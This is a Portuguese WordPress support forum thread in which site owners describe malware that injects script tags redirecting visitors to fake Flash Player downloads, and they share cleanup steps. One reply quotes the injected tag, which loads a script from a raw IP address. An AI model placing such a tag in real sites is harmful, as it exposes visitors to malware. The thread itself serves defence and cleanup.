• Galera estou com uma falha de segurança no meu wordPress, começou aparecer nos titulos do meus post um script que redireciona para um site falso do Adobe flash player…

    Não coloquei nenhum arquivo no servidor já tem tempo, e começou do nada isso.

    Alguém sabe algo sobre isso?

    Versão do meu WordPress é: 3.5

Visualizando 15 respostas - 1 até 15 (de um total de 17)
  • Aparentemente estou com o mesmo problema, redireciona por exemplo: http://87.106.35.192/br/flashplayer/download/

    Versão do meu WordPress: 3.3.1

    Criador do tópico over12

    (@over12)

    Esse mesmo, o disgramado coloca um script no titulo do Post, a solução que encontrei é manualmente acesso a area de posts e mando procurar pelo IP ai deleto manualmente, mas a questão por onde que ele esta acessando…

    Pessoal tive que resolver um problema extamente com este, ainda não descobri a fonte e nao tem muita informação sobre este problema parece ser um malware novinho. Acredito que ele altera o arquivo .htaccess.
    Eu coloquei a permissão 444 para o .htaccess para somente permitir leitura até agora parece que resolveu, mas de qualquer forma tem que achar a fonte desta praga.

    Criador do tópico over12

    (@over12)

    Opá obrigado pela Dica, já mudei o chmod do meu aqui.. 😛

    Outro remédio para impedir o bug causado pela praga é inserir este codigo no wp-config.php
    define( ‘DISALLOW_UNFILTERED_HTML’, true );

    Mas de qualquer forma mesmo resolvendo o but, temos que continuar tentando achar a fonte.

    Olá pessoal, estou com o mesmo problema. Alem da pagina inicial (index.php) também o script aparece num widgets, ele cria um novo texto num widgets ativo.

    Já é a segunda vez que excluo. Vamos ver se volta.

    Ricardo Avelino?

    O vírus voltou?

    Criador do tópico over12

    (@over12)

    Bom o meu não volto…
    Usei as dicas do Mateus e até o momento estou sem dor de cabeça!

    Eu tento alterar as permissões mais volta para a que estava.

    Olá,

    Voltou sim, no domingo eu achei o danado no mesmo widgets, mas na index.php não tinha nada….

    Estranho demais.

    Eu até tentei alterar a permissão para 444 conforme o colega acima falou, mas não consegui pois esse site está hospedado no Uol Host e não achei como mudar isso, coisa que faço facil facil no Cpanel da minha revenda.

    Criador do tópico over12

    (@over12)

    Eu também estava feliz que não tinha voltado…
    Porém hoje (08/05) o disgramado voltou…..

    Estou com esse problema desde o começo de 2013. Já fiz de tudo e ele sempre volta, cada hora com um script diferente. Estou muito preocupado, parece um problema sem fim!

    Cada hora ele ataca um arquivo diferente, já foi na index, wp-config, blog-header, vários arquivos do meu template e também em widgets.

    Preciso de ajuda!

    Já existe vários tópicos com a solução para este virus.

    Dê uma consultada abaixo.

    Veja aqui o Tópico

    Veja aqui outro Tópico

    Entre na raiz do wordpress, apague qualquer página que não seja do wp, em seguida abra a pagina index.php do seu tema, procure por este script no início da página – <script src=”http://50.22.91.159/br/flashplayer/”></script&gt; ou parecido, DELETE, substitua as paginas, e pronto, aqui resolveu, porem meu problema estava na pesquisa, quando se pesquisava algum produto o site era redirecionado para uma página falsa do flash, isto estava tambem nos widgets de busca, não sei se o problema foi resolvido de uma vez por todas ou se pode voltar, mude tambem as senhas de ftp e da administração do wp.

    fiz o download do banco de dados pelo phpmyadmin, abri no Dreamweaver, e procurei pelo endereço que fui redirecionado e encontrei, tinha 3 ou 4 scripts com os endereços ao qual meu site era redirecionado, deletei os scripts no próprio Dreamweaver, entrei no banco de dados e LIMPEI as TABELAS nao EXCLUI, depois eu importei novamente sem os scripts, alterei as senhas novamente, ate agora resolveu

Visualizando 15 respostas - 1 até 15 (de um total de 17)
  • O tópico ‘Vírus em Blog, Falso Adobe Flash!’ está fechado para novas respostas.